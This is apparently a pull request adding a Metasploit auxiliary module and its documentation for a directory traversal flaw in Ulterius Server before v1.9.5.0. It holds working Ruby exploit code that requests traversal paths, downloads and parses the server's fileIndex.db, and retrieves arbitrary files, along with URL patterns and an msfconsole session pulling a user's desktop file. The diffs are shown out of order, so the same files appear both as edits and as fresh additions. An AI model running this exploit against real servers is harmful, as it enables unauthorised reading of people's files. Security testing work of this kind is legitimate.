### PR TITLE
Ulterius Server < v1.9.5.0 Directory Traversal

### DIFF
--- a/documentation/modules/auxiliary/admin/http/ulterius_file_download.md
+++ b/documentation/modules/auxiliary/admin/http/ulterius_file_download.md
@@ -1,27 +1,12 @@
-## Overview
+## Description
 
-This module exploits a directory traversal vulnerability in [Ulterius Server < v1.9.5.0](https://github.com/Ulterius/server/releases). The directory traversal flaw occurs in Ulterius Server's HttpServer.Process function call. While processing file requests, the HttpServer.Process function does not validate that the requested file is within the web server's root directory or a subdirectory.
+This module exploits a directory traversal vulnerability in [Ulterius Server < v1.9.5.0](https://github.com/Ulterius/server/releases). The directory traversal flaw occurs in Ulterius Server's `HttpServer.Process` function call. While processing file requests, the `HttpServer.Process` function does not validate that the requested file is within the web server's root directory or a subdirectory.
 
-## Verification Steps
+## Vulnerable Application
 
-- [ ] Install Ulterius Server < v1.9.5.0
-- [ ] `./msfconsole`
-- [ ] `use auxiliary/admin/http/ulterius_file_download`
-- [ ] `set index true`
-- [ ] `set targeturi '/…/fileIndex.db'`
-- [ ] `set rhost <rhost>`
-- [ ] `run`
-- [ ] Verify loot contains file system paths from remote file system.
-- [ ] `set index false`
-- [ ] `set targeturi '/C:/<path>/<to>/<file>'`
-- [ ] `run`
-- [ ] Verify contents of file
+When requesting a file, a relative or absolute file path is needed so the appropriate request can be generated. Fortunately, Ulterius Server creates a file called `fileIndex.db`, which contains filenames and directories located on the server. By requesting `fileIndex.db` and parsing the retrieved data, absolute file paths can be retrieved for files hosted on the server. Using the information retrieved from parsing `fileIndex.db`, additional requests can be generated to download desired files.
 
-## Exploiting the Vulnerability 
-
-When requesting a file, a relative or absolute file path is needed so the appropriate request can be generated. Fortunately, Ulterius Server creates a file called fileIndex.db, which contains filenames and directories located on the server. By requesting fileIndex.db and parsing the retrieved data, absolute file paths can be retrieved for files hosted on the server. Using the information retrieved from parsing fileIndex.db, additional requests can be generated to download desired files.
-
-As noted in the [EDB PoC](https://www.exploit-db.com/exploits/43141/), the fileIndex.db is usually located at:
+As noted in the [EDB PoC](https://www.exploit-db.com/exploits/43141/), the `fileIndex.db` is usually located at:
 
 `http://ulteriusURL:22006/.../fileIndex.db`
 
@@ -31,49 +16,49 @@ After retrieving absolute paths for files, the files can be retrieved by sending
 
 `http://ulteriusURL:22006/<DriveLetter>:/<path>/<to>/<file>`
 
-Note: The [EDB PoC](https://www.exploit-db.com/exploits/43141/) used relative paths to download files but absolute paths can be used on Windows-platforms as well, because the HttpServer.Process function made use of the [Path.Combine](https://msdn.microsoft.com/en-us/library/fyy7a5kt(v=vs.110).aspx) function.
+Note: The [EDB PoC](https://www.exploit-db.com/exploits/43141/) used relative paths to download files but absolute paths can be used on Windows-platforms as well, because the `HttpServer.Process` function made use of the [Path.Combine](https://msdn.microsoft.com/en-us/library/fyy7a5kt(v=vs.110).aspx) function.
 
 > If *path2* includes a root, *path2* is returned. 
 
-## Example Execution
+## Options
 
-This module was testing on Windows 7 SP1 x64.
+**TARGETURI**
+
+This option specifies the absolute or relative path of the file to download. (default: `/…/fileIndex.db`)
+
+Note: If you are using relative paths, use three periods when traversing down a level in the directory structure. If absolute paths are used, make sure to include the drive letter.
+
+## Verification Steps
+
+- [ ] Install Ulterius Server < v1.9.5.0
+- [ ] `./msfconsole`
+- [ ] `use auxiliary/admin/http/ulterius_file_download`
+- [ ] `set rhost <rhost>`
+- [ ] `run`
+- [ ] Verify loot contains file system paths from remote file system.
+- [ ] `set targeturi '/<DriveLetter>:/<path>/<to>/<file>'`
+- [ ] `run`
+- [ ] Verify contents of file
+
+## Scenarios
+
+### Ulterius Server v1.8.0.0 on Windows 7 SP1 x64.
 
 ```
-msf5 auxiliary(admin/http/ulterius_file_download) > options
-
-Module options (auxiliary/admin/http/ulterius_file_download):
-
-   Name       Current Setting  Required  Description
-   ----       ---------------  --------  -----------
-   INDEX      false            no        Attempt to retrieve and parse fileIndex.db
-   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOST                       yes       The target address
-   RPORT      22006            yes       The target port (TCP)
-   SSL        false            no        Negotiate SSL/TLS for outgoing connections
-   TARGETURI  /                yes       The path of the web application
-   VHOST                       no        HTTP server virtual host
-
-msf5 auxiliary(admin/http/ulterius_file_download) > set index true
-index => true
-msf5 auxiliary(admin/http/ulterius_file_download) > set targeturi '/.../fileIndex.db'
-targeturi => /.../fileIndex.db
+msf5 > use auxiliary/admin/http/ulterius_file_download
 msf5 auxiliary(admin/http/ulterius_file_download) > set rhost 172.22.222.122
 rhost => 172.22.222.122
 msf5 auxiliary(admin/http/ulterius_file_download) > run
 
 [*] Starting to parse fileIndex.db...
-[*] Remote file paths saved in: filepath
+[*] Remote file paths saved in: filepath0
 [*] Auxiliary module execution completed
-msf5 auxiliary(admin/http/ulterius_file_download) > set index false
-index => false
 msf5 auxiliary(admin/http/ulterius_file_download) > set targeturi '/C:/users/pwnduser/desktop/tmp.txt'
 targeturi => /C:/users/pwnduser/desktop/tmp.txt
 msf5 auxiliary(admin/http/ulterius_file_download) > run
 
-[*] Username: pwnduser
-Password: pleasedonthackme
-^not the actual password... nice try
+[*] /C:/users/pwnduser/desktop/tmp.txt
+[*] File contents saved: filepath1
 [*] Auxiliary module execution completed
-msf5 auxiliary(admin/http/ulterius_file_download) > 
+msf5 auxiliary(admin/http/ulterius_file_download) >
 ```

--- a/documentation/modules/auxiliary/admin/http/ulterius_file_download.md
+++ b/documentation/modules/auxiliary/admin/http/ulterius_file_download.md
@@ -1,0 +1,79 @@
+## Overview
+
+This module exploits a directory traversal vulnerability in [Ulterius Server < v1.9.5.0](https://github.com/Ulterius/server/releases). The directory traversal flaw occurs in Ulterius Server's HttpServer.Process function call. While processing file requests, the HttpServer.Process function does not validate that the requested file is within the web server's root directory or a subdirectory.
+
+## Verification Steps
+
+- [ ] Install Ulterius Server < v1.9.5.0
+- [ ] `./msfconsole`
+- [ ] `use auxiliary/admin/http/ulterius_file_download`
+- [ ] `set index true`
+- [ ] `set targeturi '/…/fileIndex.db'`
+- [ ] `set rhost <rhost>`
+- [ ] `run`
+- [ ] Verify loot contains file system paths from remote file system.
+- [ ] `set index false`
+- [ ] `set targeturi '/C:/<path>/<to>/<file>'`
+- [ ] `run`
+- [ ] Verify contents of file
+
+## Exploiting the Vulnerability 
+
+When requesting a file, a relative or absolute file path is needed so the appropriate request can be generated. Fortunately, Ulterius Server creates a file called fileIndex.db, which contains filenames and directories located on the server. By requesting fileIndex.db and parsing the retrieved data, absolute file paths can be retrieved for files hosted on the server. Using the information retrieved from parsing fileIndex.db, additional requests can be generated to download desired files.
+
+As noted in the [EDB PoC](https://www.exploit-db.com/exploits/43141/), the fileIndex.db is usually located at:
+
+`http://ulteriusURL:22006/.../fileIndex.db`
+
+Note: 22006 was the default port after setting up the Ulterius Server.
+
+After retrieving absolute paths for files, the files can be retrieved by sending requests of the form:
+
+`http://ulteriusURL:22006/<DriveLetter>:/<path>/<to>/<file>`
+
+Note: The [EDB PoC](https://www.exploit-db.com/exploits/43141/) used relative paths to download files but absolute paths can be used on Windows-platforms as well, because the HttpServer.Process function made use of the [Path.Combine](https://msdn.microsoft.com/en-us/library/fyy7a5kt(v=vs.110).aspx) function.
+
+> If *path2* includes a root, *path2* is returned. 
+
+## Example Execution
+
+This module was testing on Windows 7 SP1 x64.
+
+```
+msf5 auxiliary(admin/http/ulterius_file_download) > options
+
+Module options (auxiliary/admin/http/ulterius_file_download):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   INDEX      false            no        Attempt to retrieve and parse fileIndex.db
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOST                       yes       The target address
+   RPORT      22006            yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The path of the web application
+   VHOST                       no        HTTP server virtual host
+
+msf5 auxiliary(admin/http/ulterius_file_download) > set index true
+index => true
+msf5 auxiliary(admin/http/ulterius_file_download) > set targeturi '/.../fileIndex.db'
+targeturi => /.../fileIndex.db
+msf5 auxiliary(admin/http/ulterius_file_download) > set rhost 172.22.222.122
+rhost => 172.22.222.122
+msf5 auxiliary(admin/http/ulterius_file_download) > run
+
+[*] Starting to parse fileIndex.db...
+[*] Remote file paths saved in: filepath
+[*] Auxiliary module execution completed
+msf5 auxiliary(admin/http/ulterius_file_download) > set index false
+index => false
+msf5 auxiliary(admin/http/ulterius_file_download) > set targeturi '/C:/users/pwnduser/desktop/tmp.txt'
+targeturi => /C:/users/pwnduser/desktop/tmp.txt
+msf5 auxiliary(admin/http/ulterius_file_download) > run
+
+[*] Username: pwnduser
+Password: pleasedonthackme
+^not the actual password... nice try
+[*] Auxiliary module execution completed
+msf5 auxiliary(admin/http/ulterius_file_download) > 
+```

--- a/modules/auxiliary/admin/http/ulterius_file_download.rb
+++ b/modules/auxiliary/admin/http/ulterius_file_download.rb
@@ -1,6 +1,3 @@
-require 'zlib'
-require 'stringio'
-
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::HttpClient
 

--- a/modules/auxiliary/admin/http/ulterius_file_download.rb
+++ b/modules/auxiliary/admin/http/ulterius_file_download.rb
@@ -10,13 +10,13 @@ class MetasploitModule < Msf::Auxiliary
       'Name'           => 'Ulterius Server File Download Vulnerability',
       'Description'    => %q{
         This module exploits a directory traversal vulnerability in Ulterius Server < v1.9.5.0
-        to download files from the affected host. A file path is needed to download a file.
-        Fortunately, Ulterius indexes every file on the system, which can be stored in the 
+        to download files from the affected host. A valid file path is needed to download a file.
+        Fortunately, Ulterius indexes every file on the system, which can be stored in the
         following location:
 
           http://ulteriusURL:port/.../fileIndex.db.
 
-        This module can download and parse the fileIndex.db file. There is also an option to 
+        This module can download and parse the fileIndex.db file. There is also an option to
         download a file using a provided path.
       },
       'Author'         =>

--- a/modules/auxiliary/admin/http/ulterius_file_download.rb
+++ b/modules/auxiliary/admin/http/ulterius_file_download.rb
@@ -1,0 +1,88 @@
+require 'zlib'
+require 'stringio'
+
+class MetasploitModule < Msf::Auxiliary
+  #Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Ulterius Server File Download Vulnerability',
+      'Description'    => %q{
+        This module exploits a directory traversal vulnerability in Ulterius Server < v1.9.5.0
+        to download files from the affected host. A file path is needed to download a file.
+        Fortunately, Ulterius indexes every file on the system, which can be stored in the 
+        following location:
+
+          http://ulteriusURL:port/.../fileIndex.db.
+
+        This module can download and parse the fileIndex.db file. There is also an option to 
+        download a file using a provided path.
+      },
+      'Author'         =>
+        [
+          'Rick Osgood',   # Vulnerability discovery and PoC
+          'Jacob Robles'   # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'EDB', '43141' ],
+          [ 'CVE', '2017-16806' ]
+        ]))
+
+      register_options(
+        [
+          Opt::RPORT(22006),
+          OptString.new('TARGETURI', [true, 'The path of the web application', '/']),
+          OptBool.new('INDEX', [false, 'Attempt to retrieve and parse fileIndex.db', false])
+        ])
+  end
+
+  def process_data(index, parse_data)
+    length = parse_data[index].unpack('C')[0]
+    length += parse_data[index+1].unpack('C')[0]
+    length += parse_data[index+2].unpack('C')[0]
+    length += parse_data[index+3].unpack('C')[0]
+
+    index += 4
+    filename = parse_data[index...index+length]
+    index += length
+    return index, filename
+  end
+
+  def inflate_parse(data)
+    zi = Zlib::Inflate.new(window_bits =-15)
+    data_inflated = zi.inflate(data)
+
+    parse_data = data_inflated[8...-1]
+    remote_files = ""
+
+    index = 0
+    print_status("Starting to parse fileIndex.db...")
+    while index < parse_data.length
+      index, filename = process_data(index, parse_data)
+      index, directory = process_data(index, parse_data)
+      remote_files += directory + '\\' + filename + "\n"
+
+      #skip FFFFFFFFFFFFFFFF
+      index += 8
+    end
+    myloot = store_loot("ulterius.fileIndex.db", "text/plain", datastore['RHOST'], remote_files, "fileIndex.db", "Remote file system")
+    print_status("Remote file paths saved in: #{myloot.to_s}")
+  end
+
+  def run
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'GET'
+    })
+    if res && res.code == 200
+      if datastore['INDEX']
+        inflate_parse(res.body)
+      else
+        print_status(res.body)
+      end
+    end
+  end
+end


### PR DESCRIPTION
This PR adds a module for a directory traversal vulnerability in Ulterius Server < v1.9.5.0.

Edited:

## Verification Steps

- [x] Install Ulterius Server < v1.9.5.0
- [x] `./msfconsole`
- [x] `use auxiliary/admin/http/ulterius_file_download`
- [x] `set rhost <rhost>`
- [x] `run`
- [x] Verify loot contains file system paths from remote file system.
- [x] `set targeturi "/<DriveLetter>:/<path>/<to>/<file>"`
- [x] `run`
- [x] Verify contents of file
